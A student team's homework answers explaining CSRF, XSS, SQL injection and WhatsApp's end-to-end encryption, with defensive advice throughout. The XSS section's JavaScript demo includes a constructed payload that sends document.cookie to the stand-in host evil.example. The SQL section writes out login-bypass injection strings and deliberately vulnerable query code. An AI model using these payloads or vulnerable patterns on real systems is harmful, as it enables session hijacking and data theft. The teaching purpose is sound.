- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? And what is the attacker's intention behind it?
- Consider the SQL command below; where is the vulnerability? Think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does end-to-end encryption mean? Share an example of a well-known app using E2EE; how does that app use it?
Team members : Mohamad Karbejha - Jafar bino - Reem Bino
1- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
CSRF (Cross-Site Request Forgery) is a web attack in which a user's browser is tricked into sending a request to a site where the user is already logged in, without the user intending it. It works through ordinary HTTP requests: the attacker places a link, an image tag or an auto-submitting form on a page they control, and when the victim's browser issues the resulting request it automatically attaches the victim's session cookie (and any HTTP Basic credentials) for the target site. The server therefore receives a fully authenticated request that it cannot distinguish from one the user meant to send. It is called the "one-click attack" because a single click on the attacker's link is enough to trigger the action; with an auto-submitting form, merely loading the attacker's page suffices. The defence is to require something the attacker's page cannot supply or read, such as an anti-CSRF token tied to the session, an Origin header check, or session cookies marked SameSite so the browser does not attach them to cross-site requests.
2- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
An XSS attack, or Cross-Site Scripting attack, is a type of security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into content from otherwise trusted websites. This malicious content is then delivered to a user's browser, where it can execute with the privileges of the trusted context, potentially stealing data or performing actions on behalf of the user without their consent.
The connection to cookies and sessions is that a script injected by XSS runs in the origin of the trusted site, so it can read document.cookie, call the site's own endpoints with the victim's session, and send whatever it finds to the attacker. If the attacker obtains the session cookie, they can hijack the victim's session and act as that user. Marking the session cookie HttpOnly keeps it out of document.cookie, but the injected script can still issue requests in the victim's session, so that flag limits rather than prevents the damage.
There are two main categories of XSS:
Stored XSS (Persistent XSS): This occurs when the malicious script is permanently stored on the target server, such as in a database, message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when they request the stored information.
Reflected XSS (Non-Persistent XSS): This happens when the malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as a link in an email message or on a malicious website.
(DOM-based XSS, where the page's own client-side script writes untrusted data into the DOM without the server being involved, is often listed as a third category.)
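The following added example (not from the original page) renders the same injected comment with and without HTML escaping, and shows which cookies a successful script could read given how they were set. The payload, the comment markup and the Set-Cookie headers are constructed; whether the input arrived from the database (stored) or from the request (reflected) makes no difference at the renderer.

```javascript
// Added example (not from the original page): stored or reflected, the injection
// succeeds only if untrusted text reaches the HTML unescaped. The payload and
// the cookie headers below are constructed for the illustration.

// Escape the five characters that can break out of text or attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable renderer: the comment (from the DB, or a reflected search term)
// is interpolated straight into the page.
function renderUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened renderer: the same text, escaped for an HTML text node.
function renderSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Constructed payload of the kind used to exfiltrate the session cookie.
const PAYLOAD = "<script>new Image().src='https://evil.example/c?'"
  + "+encodeURIComponent(document.cookie)</script>";

// Small check: does the rendered HTML contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// What document.cookie would expose, given the Set-Cookie headers that created
// the cookies: HttpOnly cookies are invisible to script, so they cannot be stolen
// this way (the script can still send requests that carry them, though).
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0].trim());
}

function demo() {
  const setCookies = [
    'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
    'theme=dark; Path=/',
  ];
  const unsafe = renderUnsafe(PAYLOAD);
  const safe = renderSafe(PAYLOAD);
  return {
    unsafe,
    safe,
    unsafeExecutes: containsScriptTag(unsafe),
    safeExecutes: containsScriptTag(safe),
    exposed: scriptVisibleCookies(setCookies),
  };
}
```

Escaping must match the output context: the function above is right for text between tags and for quoted attribute values, but data placed inside a script block, a URL or a CSS value needs its own encoding, which is why templating engines that escape by default and a Content-Security-Policy that forbids inline scripts are the practical defences.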
3- What is SQL injection? And what is the attacker's intention behind it?
SQL injection is a code injection technique that exploits a flaw in the way an application builds its SQL queries: user input is concatenated into the query text instead of being passed as a separately typed parameter, so characters that SQL treats as syntax (quotes, comment markers, operators, statement separators) in the input change the structure of the query rather than just its data. It allows an attacker to interfere with the queries that the application makes to its database.
The attacker's intentions from an SQL injection can vary, but typically include:
Data Theft: Extracting sensitive data from the database, such as personal information, financial details, or proprietary data.
Data Loss or Corruption: Deleting records or entire tables, or changing data without authorization, which could corrupt the data or make the application unreliable or unusable.
Bypassing Authentication: Modifying the logic of SQL queries to bypass security checks, allowing for unauthorized access to the system.
Privilege Escalation: Gaining elevated access to restricted areas of the application or executing commands with higher privileges than that of the current user.
Attacking Other Systems: Using the compromised database server to mount attacks on other systems within the network.
Database Server Compromise: In some cases, SQL injection can lead to the attacker gaining administrative rights on the database server, allowing them to execute commands on the host operating system.
4- Consider the SQL command shown above; where is the vulnerability? Think about some ways an attacker can misuse it:
The vulnerability is that the template literal inserts the request's username and password straight into the SQL text, with no parameterized query, type check or escaping, so whatever the user types becomes part of the statement the database parses. Note that the template does not even quote the values: with honest input such as alice the database sees username=alice and treats alice as a column name, so the query fails; with hostile input the attacker simply supplies the quotes themselves. Because the application only checks that Count(*) is non-zero, any injection that makes the WHERE clause true for at least one row logs the attacker in.
Here's how an attacker might misuse this:
Commenting out the password check: a username of 'admin' -- turns the statement into SELECT Count(*) FROM Users WHERE username='admin' -- AND password=..., so the count is 1 and the attacker is logged in as admin without knowing the password.
Bypassing authentication without a known username: a username of '' OR 1=1 -- makes the WHERE clause true for every row, so Count(*) is the total number of users and the login succeeds. (The familiar payload ' OR '1'='1 is the same idea aimed at templates that do quote the value, as in username='${username}'.)
Exfiltrating data: with UNION SELECT, or with boolean- and time-based blind techniques that observe whether the login succeeds or how long the query takes, the attacker can read other tables a value at a time.
Database schema discovery: the same techniques run against information_schema (or the server's equivalent catalog) reveal table and column names, which guide further attacks.
Database administration commands: if the application's database account has more rights than it needs, stacked or nested statements can alter or drop tables, create accounts, or on some servers run operating system commands, leading to data loss or a full server compromise.
To prevent SQL injection attacks, developers should:
Always use parameterized queries or prepared statements instead of string concatenation to create SQL queries.
Apply input validation and whitelisting to ensure only permitted characters are processed.
Employ ORM (Object Relational Mapping) tools that generate parameterized queries by design, while remembering that their raw-query escape hatches reintroduce the risk if input is concatenated into them.
Minimize the privileges of the database account that the application uses to connect to the SQL server.
Utilize web application firewalls and security tools that can detect and block SQL injection attempts as a defence-in-depth layer, not as a substitute for parameterized queries, since encoded or unusual payloads can evade signature matching.
5- What does end-to-end encryption mean? Share an example of a well-known app using E2EE; how does that app use it?
End-to-End encryption (E2EE) is a security measure that ensures that messages or data being transmitted can only be accessed and read by the sender and the intended recipient. In other words, no one in between, including the service provider, can access or decipher the content of the message.
A well-known app that uses E2EE is WhatsApp, which implements the Signal protocol. Each device generates its own key pairs locally; WhatsApp's servers store only the public halves and hand them to other users on request. When you send a message, your device combines the recipient's public key with your own private key to derive a shared session key and encrypts the message with it before it leaves your phone. Only the recipient's device, which holds the matching private key, can derive that key and decrypt the message, so WhatsApp itself cannot read it in transit or while it sits on its servers awaiting delivery.
Example: Suppose you message a friend on WhatsApp. Your phone turns the message into ciphertext that is meaningless to anyone who intercepts it and sends that ciphertext to WhatsApp's servers, which forward it to your friend's phone. Your friend's phone derives the same session key from its private key and your public key and decrypts the message. Because the servers are the ones handing out public keys, a compromised server could substitute its own; WhatsApp therefore shows a security code for each chat that both parties can compare out of band to confirm the keys match.
By using E2EE, WhatsApp ensures that the content of your messages stays private: only you and your intended recipients can read it. E2EE does not hide metadata such as who messaged whom and when, and it covers chat backups only when the optional end-to-end encrypted backups are turned on.